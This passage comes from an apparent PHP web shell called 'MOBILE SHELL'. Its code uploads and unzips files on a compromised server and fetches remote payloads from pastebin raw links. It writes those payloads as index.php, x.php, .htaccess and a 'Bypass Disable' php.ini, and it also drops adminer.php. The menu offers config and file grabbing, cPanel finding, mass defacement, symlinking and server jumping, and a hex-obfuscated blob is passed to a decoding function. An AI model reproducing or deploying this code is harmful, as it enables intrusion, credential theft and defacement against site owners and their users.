1625. echo success1($q1);
1626.            echo "<meta http-equiv='Refresh' content='0; URL=?dir=".$dir."'/>";
1627.         } else {
1628. $q1 = 'Can\'t Create Directory !!';
1629. echo failed1($q1);  } } }
1630. if(isset($_COEG['nfil'])) {
1631.     $cfile = $_COEG['newinput'];
1632.     if (file_exists($dir.'/'.$cfile)) {
1633. $q1 = "File Already Exist !!";
1634. echo failed1($q1);
1635.     } else {
1636.         if(fopen($dir.'/'.$cfile, "w+")) {
1637.      echo "<meta http-equiv='Refresh' content='0; URL=?command=edit&dir=".$dir."&file=".$dir."/".$cfile."'/>";
1638.         } else {
1639. $q1 = 'Can\'t Create File !!';
1640. echo failed1($q1);
1641.         }
1642.     }
1643. }
1644. echo('<script language="Javascript">
1645.         function cog(){
1646. if(document.forms[\'new\'].newinput.value === "") { $.alert({
1647.     icon: "fa fa-code",
1648.     title: "MOBILE SHELL",
1649.     content: "Can\'t Be Empty !!",
1650.     theme: "Dark",
1651.     type: "red",
1652.     });
1653.    return false;
1654.     }
1655. }
1656. </script>');
1657. echo('<script type="text/javascript">
1658. function valid(field) {
1659.        var re = /^[0-9-A-z.]*$/;
1660.        if (!re.test(field.value)) {');
1661.             $s = "Invalid Name !!";
1662.             echo failed2($s);
1663.             echo('field.value = field.value.replace(/[^0-9-A-z.]/g,"");
1664.        }
1665.    }
1666. </script>');
1667. echo('<table style="margin-top:3px" cellspacing="0"><form name="new" action="?'.x5.$dir.'" method="post">
1668.     <td>
1669. <input type="text" name="newinput" onkeyup="valid(this);"></td>
1670. <td><input type="submit" class="btn-exe" name="ndir" onclick="return cog();" value="ND"></td>
1671. <td><input type="submit" class="btn-exe" name="nfil" onclick="return cog();" value="NF"></td></form></table>');
1672.  }
1673.  
1674.  echo '<hr></div>';
1675. echo '<div class="coR">
1676.         <div class="coR-panel"><table>
1677. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">TOOLS</td></table></div>
1678. <div class="tools-content" style="padding:5px">';
1679. $path = getcwd();
1680. if(isset($_FILES['data'])) {
1681. if(copy($_FILES['data']['tmp_name'],$path.'/'.$_FILES['data']['name'])) {
1682.     $q1 = 'File Uploaded !!';
1683.     $t1 = '?'.x5.$dir;
1684.     fauto2($q1, $t1);
1685. } else {
1686.     $q1 = 'Upload Failed !!';
1687.     failed1($q1);
1688.     }
1689. }
1690. echo '<script>function upload(){
1691. if(document.getElementById("up").value == ""){
1692.      $.alert ({
1693.         icon: "fa fa-code",
1694.         title: "MOBILE SHELL",
1695.         content: "Select Your File !!",
1696.         theme: "Dark",
1697.         type: "red",
1698.         });
1699.      return false;
1700.    }
1701.    document.getElementById("%").submit();
1702.  }
1703. </script>';
1704. echo '<table><td align="center" style="width:10%"><i class="fa fa-bookmark-o"></i></td><td style="width:70%"><form enctype="multipart/form-data" action="?'.x5.$dir.'" method="POST"><input type="file" name="data" id="up"></td><td style="width:20%"><button type="submit" class="btn-exe" onclick="upload();return false;"><i class="fa fa-arrow-circle-right"></i></button></form></td></table>';
1705. echo '<hr>';
1706. if(isset($_COEG['x'])) {
1707. $rse = $_COEG['file_name'];
1708. $zip = new ZipArchive ;
1709. if($zip ->open($path.'/'.$rse) === TRUE) {
1710. $zip ->extractTo($path);
1711. $zip ->close();
1712.     $q1 = '[ '.$rse.' ] Extracted !!';
1713.     $t1 = '?'.x5.$dir;
1714.     fauto2($q1, $t1);
1715. } else {
1716.     $q1 = 'Permission Denied !!';
1717.     failed1($q1);
1718.     }
1719. }
1720. echo '<script>function unzip(){
1721. if(document.getElementById("u").value == ""){
1722.      $.alert ({
1723.         icon: "fa fa-code",
1724.         title: "MOBILE SHELL",
1725.         content: "Select Archive File [ .zip] !!",
1726.         theme: "Dark",
1727.         type: "red",
1728.         });
1729.      return false;
1730.    }
1731.    document.getElementById("sks").submit();
1732.  }
1733. </script>';
1734. echo '<table>
1735. <form method="POST" action="?'.x5.$dir.'">
1736. <td align="center" style="width:10%"><i class="fa fa-bookmark-o"></i></td>
1737. <td style="width:70%"><select name="file_name" id="u">
1738. <option value=""> &mdash;&mdash; Choose File &mdash;&mdash;</option>';
1739. $scandir = scandir($path);
1740. foreach($scandir as $file){
1741. if(!is_file("$path/$file")) continue;
1742. if(preg_match('/\.zip$/mis',$file)) {
1743. echo '<option>'.$file.'</option>';
1744.     }
1745. }
1746. echo '</select></td><td style="width:20%;text-align:right"><button type="submit" name="x" class="btn-exe" onclick="unzip();return false;"><i class="fa fa-arrow-circle-right"></i></button></form></td></table>';
1747.  
1748. if($_COEG['ms_cr']=="0") {
1749.     $alert = 'What Are You Doing Men ?';
1750.     failed1($alert);
1751. }
1752. if($_COEG['ms_cr']=="1") {
1753. $rz = 'https://pastebin.com/raw/bC5Yx72V';
1754. $x = file_get_contents($rz);
1755. if(empty($x)) {
1756. $q1 = 'Can\'t Create File !!';
1757. failed1($q1); } else {
1758. $q1 = 'File Created !!';
1759. $t1 = '?'.x5.$dir;
1760. $t1 = '?'.x5.$dir;
1761. fauto2($q1, $t1);
1762. $fp = fopen($dir."/index.php", "w");
1763. fwrite($fp, $x);
1764. fclose($fp);
1765.     }
1766. }
1767. if($_COEG['ms_cr']=="2") {
1768. $rz = 'http://pastebin.com/raw/156wCF33';
1769. $x = file_get_contents($rz);
1770. if(empty($x)) {
1771. $q1 = 'Can\'t Create File !!';
1772. failed1($q1); } else {
1773. $q1 = 'File Created !!';
1774. $t1 = '?'.x5.$dir;
1775. fauto2($q1, $t1);
1776. fauto2($q1, $t1);
1777. $fp = fopen($dir."/x.php", "w");
1778. fwrite($fp, $x);
1779. fclose($fp);
1780.     }
1781. }  
1782. if($_COEG['ms_cr']=="3") {
1783. $rz = x4.'/adminer.txt';
1784. $x = file_get_contents($rz);
1785. if(empty($x)) {
1786. $q1 = 'Can\'t Create File !!';
1787. failed1($q1); } else {
1788. $q1 = 'File Created !!';
1789. $t1 = '?'.x5.$dir;
1790. fauto2($q1, $t1);
1791. $fp = fopen($dir."/adminer.php", "w");
1792. fwrite($fp, $x);
1793. fclose($fp);
1794.     }
1795. }  
1796. if($_COEG['ms_cr']=="4") {
1797. $rz = 'http://pastebin.com/raw/fRyCn3bQ';
1798. $x = file_get_contents($rz);
1799. if(empty($x)) {
1800. $q1 = 'Can\'t Create File !!';
1801. failed1($q1); } else {
1802. $q1 = 'File Created !!';
1803. $t1 = '?'.x5.$dir;
1804. fauto2($q1, $t1);
1805. $fp = fopen($dir."/.htaccess", "w");
1806. fwrite($fp, $x);
1807. fclose($fp);
1808.     }
1809. }  
1810. if($_COEG['ms_cr']=="5") {
1811. $rz = 'http://pastebin.com/raw/gnbXUciS';
1812. $x = file_get_contents($rz);
1813. if(empty($x)) {
1814. $q1 = 'Can\'t Create File !!';
1815. failed1($q1); } else {
1816. $q1 = 'File Created !!';
1817. $t1 = '?'.x5.$dir;
1818. fauto2($q1, $t1);
1819. $fp = fopen($dir."/php.ini", "w");
1820. fwrite($fp, $x);
1821. fclose($fp);
1822.     }
1823. }  
1824. echo '</div>';
1825. echo('<div class="coR-panel top"><table>
1826. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">MENU</td></table></div>
1827. <div class="tools-content">');
1828. echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">System Information</td><td class="td-tools-icon"><a href="?'.x7.'system&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
1829. echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Multiple Upload</td><td class="td-tools-icon"><a href="?'.x7.'upload&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
1830. echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Jumping Server</td><td class="td-tools-icon"><a href="?'.x7.'jumping&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
1831. echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Config Grabber</td><td class="td-tools-icon"><a href="?'.x7.'config&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
1832. echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">File Grabber</td><td class="td-tools-icon"><a href="?'.x7.'filegrab&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
1833. echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Cpanel Finder</td><td class="td-tools-icon"><a href="?'.x7.'cpanel&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
1834. echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Mass Deface</td><td class="td-tools-icon"><a href="?'.x7.'massdef&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
1835. echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">MD5 Creator</td><td class="td-tools-icon"><a href="?'.x7.'md5&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
1836. echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Multi Symlink</td><td class="td-tools-icon"><a href="?'.x7.'symlink&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
1837. echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Change Password</td><td class="td-tools-icon"><a href="?'.x7.'change&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
1838. echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Me : [ <font color="#1D9D73">'.str_replace('/', '', basename($_SERVER['PHP_SELF'])).' </font> ]</td><td class="td-tools-icon"><a href="?'.x7.'kill&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-trash"></i></button></a></td></table>');
1839. echo('</div>');
1840. echo(x("\x4e\x30\x68\x67\x63\x31\x62\x77\x4d\x79\x32\x4b\x4d\x7a\x33\x69\x63\x63\x4f\x77\x39\x39\x5a\x62\x52\x54\x76\x4c\x54\x6f\x38\x72\x30\x58\x54\x6a\x7a\x75\x6d\x56\x50\x5a\x55\x74\x70\x46\x6c\x6d\x47\x75\x58\x59\x2f\x51\x50\x7a\x57\x77\x37\x4f\x66\x2f\x32\x61\x4a\x32\x42\x6a\x31\x47\x64\x70\x78\x38\x4c\x4e\x4e\x48\x64\x68\x48\x50\x44\x6d\x67\x50\x6f\x41\x65\x50\x39\x6e\x37\x67\x30\x44\x64\x79\x78\x5a\x39\x62\x31\x36\x73\x63\x52\x63\x65\x4b\x2f\x41\x44\x74\x35\x36\x4c\x61\x46\x70\x69\x63\x38\x36\x44\x33\x41\x4b\x37\x42\x4b\x68\x4b\x4b\x4e\x32\x49\x37\x33\x39\x59\x75\x55\x69\x5a\x63\x49\x76\x66\x51\x41\x58\x4f\x77\x76\x37\x2f\x67\x58\x6a\x72\x4b\x2b\x2b\x75\x59\x6b\x6a\x7a\x46\x4c\x5a\x41\x67\x31\x44\x79\x6b\x61\x54\x43\x51\x4d\x41\x43\x38\x68\x30\x61\x30\x44\x39\x50\x34\x4f\x6d\x56\x76\x49\x39\x54\x48\x68\x31\x37\x55\x62\x4c\x66\x61\x75\x44\x6b\x49\x66\x6e\x6f\x37\x49\x5a\x39\x57\x57\x78\x62\x42\x74\x6c\x6a\x38\x4b\x5a\x6e\x6d\x4b\x62\x38\x45\x6c\x6d\x4f\x66\x75\x66\x68\x54\x2f\x62\x6e\x32\x49\x6f\x6a\x61\x44\x63\x72\x34\x66\x7a\x70\x48\x6d\x57\x71\x48\x72\x74\x34\x35\x4c\x58\x43\x33\x49\x50\x49\x72\x59\x4b\x7a\x64\x38\x49\x31\x34\x6d\x62\x4d\x74\x43\x37\x56\x5a\x52\x4b\x5a\x77\x4f\x31\x5a\x5a\x46\x50\x43\x6f\x79\x75\x56\x5a\x76\x38\x6a\x47\x48\x45\x56\x45\x56\x4e\x62\x36\x30\x30\x39\x6c\x50\x6e\x4f\x4d\x52\x58\x66\x44\x2f\x79\x70\x66\x7a\x5a\x52\x37\x4e\x6c\x2b\x33\x6f\x65\x50\x66\x6d\x62\x50\x73\x73\x37\x2b\x73\x62\x6c\x2f\x77\x42\x58\x2b\x32\x70\x6c\x71\x74\x6c\x7a\x49\x50\x43\x78\x57\x49\x55\x56\x6b\x78\x69\x2b\x4e\x2f\x79\x70\x4f\x69\x45\x69\x38\x66\x4d\x42\x6d\x78\x53\x66\x43\x61\x72\x47\x73\x6e\x42\x59\x50\x44\x34\x6b\x4d\x4b\x7a\x4d\x32\x31\x42\x47\x6d\x51\x61\x7a\x6b\x54\x49\x78\x54\x7a\x38\x66\x6e\x75\x4d\x4a\x75\x70\x4f\x45\x5a\x71\x33\x47\x78\x6b\x61\x55"));
1841. echo('<div class="tools-content top" style="padding:5px">');
1842. echo('<table>
1843. <form action="?'.x5.$dir.'" method="POST"><td align="center" style="width:10%"><i class="fa fa-bookmark-o"></span></td>
1844. <td style="width:70%"><select name="ms_cr" id="c">');
1845. echo('<option value=""> &mdash;&mdash; Choose File &mdash;&mdash;</option>');
1846. echo('<option value="1">Create File [ index.php ]</option>');
1847. echo('<option value="2">Create File [ x.php ]</option>');
1848. echo('<option value="3">Adminer [ adminer.php ]</option>');
1849. echo('<option value="4">Security [ .htaccess ]</option>');
1850. echo('<option value="5">Bypass Disable [ php.ini ]</option>');
1851. echo('</select></td>
1852. <td style="width:20%;text-align:right"><button type="submit" class="btn-exe" onclick="create();return false;"><i class="fa fa-arrow-circle-right"></i></button></form></td></table>
1853. </div></div></div>
1854. </div></div></div><div class="co-ontainer"><div class="footer">CODED BY WILDAN IZZUDIN</div></div>');
1855.  
1856. echo('<script>
1857. function ex(t) {
1858.     var yx = window.navigator.vibrate(t);
1859.       $.dialog ({
1860.         icon: "fa fa-drupal",
1861.         title: "MOBILE SHELL",
1862.         content: "I am convinced that, because the criminal justice system is run by humans, it is naturally subject to human error. There is no rational basis to believe that this same type of <font color=\'#1D9D73\'>Human Error</font> will not infect capital murder trials.",
1863.         animation: "Rotate",
1864.         theme: "Dark",
1865.             });
1866.      }
1867. </script>');
1868. ?>